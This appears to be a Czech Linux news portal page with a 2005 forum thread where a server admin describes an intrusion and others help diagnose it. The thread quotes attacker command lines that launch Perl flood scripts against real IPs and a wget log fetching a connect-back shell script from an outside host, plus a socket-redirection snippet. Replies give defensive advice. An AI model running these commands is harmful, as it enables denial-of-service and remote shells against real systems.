abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
14.7. 22:44 | Nová verze

Bylo oznámeno vydání KDE Frameworks 5.48.0, tj. nové verze aktuálně 72 knihoven rozšířujících multiplatformní framework Qt. Řešena je mimo jiné bezpečnostní chyba CVE-2018-10361 v KTextEditoru zneužitelná k lokální eskalaci práv. Knihovny KDE Frameworks jsou dnes využívány nejenom KDE Plasmou a KDE Aplikacemi.

Ladislav Hagara | Komentářů: 5
14.7. 20:11 | Nová verze

Byl vydán Debian 9.5, tj. pátá opravná verze Debianu 9 s kódovým názvem Stretch. Řešeny jsou především bezpečnostní problémy, ale také několik vážných chyb. Předchozí instalační média Debianu 9 Stretch lze samozřejmě nadále k instalaci používat. Po instalaci stačí systém aktualizovat.

Ladislav Hagara | Komentářů: 4
13.7. 23:55 | Komunita

V Národní technické knihovně (NTK) je 150 nových počítačů s operačním systémem Linux, konkrétně s linuxovou distribucí Fedora. Do konce prázdnin si na nich lze zahrát počítačovou hru Factorio (Wikipedie). V pondělí 23. 7. proběhne LAN party s vývojáři této hry.

Ladislav Hagara | Komentářů: 0
13.7. 17:33 | Zajímavý software

Fanatical (Wikipedie) má ve slevě řadu počítačových her běžících také na Linuxu. Balíček her Fanatical Strategy Bundle lze koupit za 1,99 eur.

Ladislav Hagara | Komentářů: 1
13.7. 11:44 | Zajímavý software

Byla vydána počítačová hra Warhammer 40,000: Gladius - Relics of War běžící také na Linuxu. Koupit ji lze na GOG, Humble Store i na Steamu. Videoukázka na YouTube.

Ladislav Hagara | Komentářů: 0
13.7. 10:33 | Komunita

Guido van Rossum, původní tvůrce a doposud vedoucí projektu Python, oznámil, že opouští svou roli, tedy již se nebude podílet na tvorbě PEP a výběru hlavních vývojářů, odchází na odpočinek a do budoucna bude nejvýše řadovým přispěvatelem. Situace vyplynula mj. z procesu schvalování PEP 572.

Fluttershy, yay! | Komentářů: 4
12.7. 17:22 | Nasazení Linuxu

Článek na OMG! Ubuntu! představuje vesmírného interaktivního asistenta CIMON (Crew Interactive Mobile CompaniON) vyvinutého ve spolupráci firem Airbus a IBM. Uvnitř této osmikilogramové koule s osmipalcovým displejem běží Ubuntu. Více ve videu na YouTube.

Ladislav Hagara | Komentářů: 6
12.7. 12:00 | Zajímavý software

Uživatelé Androidu si z Google Play mohou nainstalovat aplikaci Notes by Firefox od Mozilly. Jedná se o jednoduchý poznámkový blok synchronizovaný z rozšířením Firefoxu Notes z Firefox Test Pilotu.

Ladislav Hagara | Komentářů: 7
11.7. 14:44 | Nová verze

Byla vydána nová verze 1.25 editoru zdrojových kódů Visual Studio Code (Wikipedie). Přehled novinek i s náhledy a animovanými gify v poznámkách k vydání. Představení novinek také na YouTube.

Ladislav Hagara | Komentářů: 23
11.7. 14:33 | Bezpečnostní upozornění

Byly zveřejněny informace o dalších dvou variantách bezpečnostní chyby Spectre v procesorech. V publikovaném článku (pdf) se o nich píše jako o variantách 1.1 (CVE-2018-3693) a 1.2.

Ladislav Hagara | Komentářů: 1
Jak čtete delší texty z webových stránek?
 (77%)
 (21%)
 (5%)
 (7%)
 (2%)
 (10%)
Celkem 347 hlasů
 Komentářů: 40, poslední 29.6. 10:21
    Rozcestník

    Dotaz: Průnik do webserveru :(

    29.8.2005 15:12 Rover | skóre: 10
    Průnik do webserveru :(
    Přečteno: 150×
    Zdravím, dneska jsme zaznamenali problém s počtem odeslaných paketů z našeho webserveru. Výpisem procesů jsem zjistil, že se spustili perlovské skritpy, které posílají cca 8000paketů/s na určitou ip adresu na port 80.

    ps ax -vypadal takto:

    sh -c cd /tmp;perl sbyte.t 67.43.159.2 80 99999999999 0 2>&1

    sh -c cd /tmp;perl sbyte.t 72.20.3.74 80 99999999999 16 2>&1

    ... z logů jsem zjistil, že byl tento(a ještě 3 další) nakopírovány z ip 195.213.50.200

    výpis logu apache

    --11:20:39-- http://www.asf.toscana.it/tmp/conback.pl => `conback.pl'

    Resolving www.asf.toscana.it... 159.213.50.200

    Connecting to www.asf.toscana.it[159.213.50.200]:80... connected.

    HTTP request sent, awaiting response... 200 OK Length: 1,100 [text/x-perl]

    OK . 100% 10.49 MB/s

    11:20:39 (10.49 MB/s) - `conback.pl' saved [1100/1100]

    -toto mi příjde, jako stažení pomocí wget. Nic víc jsem z logů nenašel,,, Pomocí ssh se na server nepřihlásil.

    Netušíte, kudy mohl útočník nahrát tyto skripty a hlavně jak je spustil??? Celkem by nám pomotal hlavu, kdyby nechal smazat celý adresář /var/www :(

    Odpovědi

    29.8.2005 16:35 petr_p
    Rozbalit Rozbalit vše Re: Průnik do webserveru :(
    Nicmene pochybuji, ze panum fungoval ten bindshell ;), kdyz v conback.pl maji toto:
    open(STDIN, ">&SOCKET");
    open(STDOUT, ">&SOCKET");
    
    29.8.2005 19:10 Rover | skóre: 10
    Rozbalit Rozbalit vše Re: Průnik do webserveru :(
    Tak koukám, že někdo opravdu už toto viděl a zažil....

    kdybyste chtěli, dám skripty conback.pl a sbyte.t k nahlédnutí...

    --Nejvíce by mě zajímalo, jak to tam dostali a jak to spustili? Ihned jsem aktualizoval Apache i perlové věcičky...
    29.8.2005 19:41 petr_p
    Rozbalit Rozbalit vše Re: Průnik do webserveru :(
    Ne, nezazil ani nevidel (vlaste jednou ano, ale to byl cizi stroj, kde bylo _velmi_ slabe heslo).

    Ten connback.pl jsem vytahnul z URL ve vasem postu. Nicmene sbyte.t by me zajimal. Podle popisu to vypada na DDoS utok.

    Kudy se tam dosali? Na to jste poskytnul malo informaci. Existuji v zasade dve moznosti. Bud vyuzili nejakou chybu typu buffer overflow v nejake webove aplikaci (pak ale ta aplikace musela byt dostatecne znama -- napr. phpBB).

    Nebo a to bych videl jako pravdepodobnejsi, mate chybu ve vasich perlovych skriptech (napr. escapovany shellovy prikaz ve zpetnych apostofech ze vstupu -- BTW, pouzivate tainted modul?). Na to by ukazoval vystup, ktery jste nasel v httpd logu -- stderr vystup vaseho skriptu, ktery spustil wget. Byl to vas skript (apache hlasi nazev skriptu, ktery produkuje chybovy vystup)?
    29.8.2005 20:07 Rover | skóre: 10
    Rozbalit Rozbalit vše Re: Průnik do webserveru :(
    DoS útok to je na 100% akorát, že náš server byl využit jako hostitelský stroj, ze kterého útok byl páchán.

    Moc se bohužel v typech průniků nevyznám. V logu u toho překopírování nic jiného není. Třeba náznak který skript to byl -opravdu nic. Perlové skripty používám málokdy. Vlastní přístupné z webu nemám, pouze ty komerční (cricket,smokeping...), ale ty počítám že zásadní chybu ve skriptu nemají.

    Z modulů apache používám:

    config_log_module, mime_module, negotiation_module, status_module, includes_module, autoindex_module, dir_module, cgi_module, speling_module, userdir_module, alias_module, rewrite_module, access_module, auth_module, expires_module, unique_id_module, setenvif_module, dav_module, php4_module

    pokuď máte zájem o ten druhý sbyte.t skript, dejte mi mailovku -pošlu Vám to. (teda pokuď to neobrátíte proti mě :) )
    29.8.2005 20:28 petr_p
    Rozbalit Rozbalit vše Re: Průnik do webserveru :(
    Za ten log se omlouvam, ted jsem si to overoval, a apache do error_logu opravdu (defaulne) nepise nazev skriptu, ktery neco vypoti na stderr. Kazdopadne jsem tam videl u vas cas. Podivejte se do access_logu na stejny cas. Najdete te tam vsechny http pozadavky, takze i nazvy skriptu, ktere byly pres HTTP volany.

    Tim tainted modulem jsem myslel perlovsky modul, ktery dokaze hlidat pohyb dat po skriptu a napr. odmine spustit prikaz, ktery pochazi ze vstupu od uzivatele.

    Kazdopadne, pokud nenajdete bezpecnosti chybu, doporucuji uktualizovat veskery sofwtare, ktery je volan z webovych skriptu a stroj po nejakou dobu hlidat. Pripadne napiste spravcovi site, ze ktere jste byl hacknut (pokud na to prijdete), protoze pravdepodobne i on byl kompromitovan.
    29.8.2005 20:45 Rover | skóre: 10
    Rozbalit Rozbalit vše Re: Průnik do webserveru :(
    Do access_logu jsem se už díval a žádný skript v tu dobu se nezpouštěl... to vypadá, že se nedostal přes web server :/ ... dále jsem zjistil z výpisu služeb, že byl spuštěn "časovač" - už si to přesně nepamatuji ale něco jako "sleep 9999999 && perl sbyte.t IP.add.rre.sa 999999999 80 &" to znamená, že se to mohlo spustit o několik hodin později.... a být zapsáno do logu někdy kdysi před pár dny :/

    Založit nové vláknoNahoru

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.